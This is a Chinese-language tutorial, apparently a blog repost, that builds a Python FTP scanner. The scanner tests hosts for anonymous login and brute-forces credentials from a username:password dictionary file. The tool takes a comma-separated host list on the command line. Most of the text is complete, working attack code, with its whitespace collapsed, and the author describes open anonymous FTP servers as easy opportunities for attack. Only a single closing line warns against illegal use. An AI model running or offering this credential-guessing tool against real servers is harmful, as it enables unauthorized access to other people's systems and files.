Python实现FTP弱口令扫描器的方法示例

Python  /  管理员 发布于 7年前   159

FTP服务器

FTP服务器是在互联网上提供文件存储和访问服务的计算机，它们依照FTP协议提供服务。FTP是File Transfer Protocol（文件传输协议）的缩写。顾名思义，就是专门用来传输文件的协议，简单地说，支持FTP协议的服务器就是FTP服务器

FTP是仅基于TCP的服务，不支持UDP（想想也是，传输文件，肯定要稳定可靠，建立连接，所以不支持UDP）。与众不同的是FTP使用2个端口，一个数据端口，一个命令端口（也叫控制端口）。通常来说这两个端口分别是21（命名端口）和20（数据端口）。但由于FTP工作方式的不同，数据端口并不总是20.这就是主动与被动FTP的最大不同之处。

• 主动FTP

FTP服务器的控制端口是21，数据端口是20，所以在做静态映射的时候只需开放21端口即可，他会用20端口和客户端主动发起连接

• 被动FTP

服务器的控制端口是21，数据端口是随机的，且是客户端去连接对应的数据端口，所以在做静态映射的话只开放21端口不可以的

FTP扫描的实现方案

扫描匿名FTP

FTP匿名登陆的扫描主要应用与批量扫描中，单独针对一个FTP服务器进行扫描的话成功率比较小。很多网站都开放FTP服务方便用户下载资源（这个允许匿名登陆不足为奇），更疯狂的是网站管理人员为了方便网站访问软件的更新也开放了FTP匿名登陆，这样就给了我们很多机会，尤其后者的服务器很容易受到攻击

扫描FTP弱口令

弱口令扫描其实就是暴力破解，不过我们只是扫描一些简单的密码组合，并不是所有可能的密码组合

步骤

FTP匿名扫描器的实现

这里需要用到Python的 ftplib 库中的FTP这个类，这个类实现了FTP客户端的大多数功能，比如连接FTP服务器、查看服务器中的文件、上传、下载文件等功能，详细用法可以查看API，接下来我们首先定义 anonScan(hostname) 这个函数以实现扫描可匿名登陆的FTP服务器。代码如下：

def anonScan(hostname):      # 参数是主机名  try:    with FTP(hostname) as ftp: # 创建FTP对象      ftp.login()      # FTP匿名登陆      print("\n[*]" + str(hostname) + " FTP Anonymous login successful!")      return True    except Exception as e:   # 抛出异常表示匿名登陆失败      print("\n[-]" + str(hostname) + " FTP Anonymous login failure!")      return False

代码很简短，注释也写的很清楚。这里还是说一下函数的思路，首先用主机名构造了一个FTP对象（即ftp），然后用ftp调用不带参数的login()函数即表示要匿名登陆这个FTP服务器，如果登陆过程中没有产生异常，则表明匿名登陆成功，否则匿名登陆失败

FTP弱口令的扫描

FTP弱口令扫描依赖于用户名和密码字典，密码字典 下载 ，下载之后我们将其命名为 pwd.txt

接下来针对字典中的格式来实现FTP弱口令扫描，创建代码文件 ftpScanner.py ，代码如下：

def vlcLogin(hostname, pwdFile):        # Parameters (hostname, dictionary file)  try:    with open(pwdFile, 'r') as pf:     # Open dictionary file      for line in pf.readlines():        userName = line.split(':')[0]  # Fetch username        passWord = line.split(':')[1].strip('\r').strip('\n') # Fetch password        print('[+] Trying: ' + userName + ':' + passWord)        try:          with FTP(hostname) as ftp:ftp.login(userName, passWord)print('\n[+] ' + str(hostname) + ' FTP Login successful: '+ \   userName + ':' + passWord)return (userName, passWord)        except Exception as e:          # Continue trying other usernames and passwords          pass  except IOError as e:    print('Error: the password file does not exist!')  print('\n[-] Cannot crack the FTP password, please change the password dictionary try again!')  return (None,None)

这段代码其实就是循环从字典中读取用户名和密码并尝试登陆，登陆成功则表明找到用户名和密码。由于这个函数将主机名定义成了可以用 , 分割的字符串。找到密码并不会终止程序，而是会继续扫描其他主机的弱口令，直到所有的主机都扫描一遍

命令行解析

至此，FTP扫描器几乎已经完成了，现在我们要做的是让我们的脚本可以处理命令行输入，以控制扫描哪些主机。命令行参数我们将用到Python中的 argparse 库。

parser = argparse.ArgumentParser(description='FTP Scanner')  parser.add_argument('-H',dest='hostName',help='The host list with ","space')  parser.add_argument('-f',dest='pwdFile',help='Password dictionary file')  options = None  try:    options = parser.parse_args()  except:    print(parser.parse_args(['-h']))    exit(0)  hostNames = str(options.hostName).split(',')  pwdFile = options.pwdFile

整合全部代码

# -*- coding: utf-8 -*-from ftplib import *import argparseimport time# Anonymous login scandef anonScan(hostname):      # The parameter is the host name  try:    with FTP(hostname) as ftp: # Create FTP object      ftp.login()      # FTP anonymous login      print("\n[*]" + str(hostname) + " FTP Anonymous login successful!")      return True  except Exception as e:   # Throwing an exception indicates that the anonymous login failed    print("\n[-]" + str(hostname) + " FTP Anonymous login failure!")    return False# Brute forcedef vlcLogin(hostname, pwdFile):        # Parameters (hostname, dictionary file)  try:    with open(pwdFile, 'r') as pf:     # Open dictionary file      for line in pf.readlines():        userName = line.split(':')[0]  # Fetch username        passWord = line.split(':')[1].strip('\r').strip('\n') # Fetch password        print('[+] Trying: ' + userName + ':' + passWord)        try:          with FTP(hostname) as ftp:ftp.login(userName, passWord)print('\n[+] ' + str(hostname) + ' FTP Login successful: '+ \   userName + ':' + passWord)return (userName, passWord)        except Exception as e:          # Continue trying other usernames and passwords          pass  except IOError as e:    print('Error: the password file does not exist!')  print('\n[-] Cannot crack the FTP password, please change the password dictionary try again!')  return (None,None)def main():  parser = argparse.ArgumentParser(description='FTP Scanner')  parser.add_argument('-H',dest='hostName',help='The host list with ","space')  parser.add_argument('-f',dest='pwdFile',help='Password dictionary file')  options = None  try:    options = parser.parse_args()  except:    print(parser.parse_args(['-h']))    exit(0)  hostNames = str(options.hostName).split(',')  pwdFile = options.pwdFile  if hostNames == ['None']:    print(parser.parse_args(['-h']))    exit(0)  for hostName in hostNames:    username = None    password = None    if anonScan(hostName) == True:      print('Host: ' + hostName + ' Can anonymously!')    elif pwdFile != None:      (username,password) = vlcLogin(hostName,pwdFile)      if password != None:        print('\n[+] Host: ' + hostName + 'Username: ' + username + \           'Password: ' + password)  print('\n[*]-------------------Scan End!--------------------[*]')if __name__ == '__main__':  main()

测试扫描

至此就可以测试我们的FTP弱口令扫描器了，在命令行中输入

python ftpScanner.py -H 127.0.0.1 -f pwd.txt

因为我本地并没有开启ftp服务，所以扫描不成功，大家可以尝试在服务器上开放FTP服务，然后进行测试，绝对不能用于非法用途

以上就是本文的全部内容，希望对大家的学习有所帮助，也希望大家多多支持。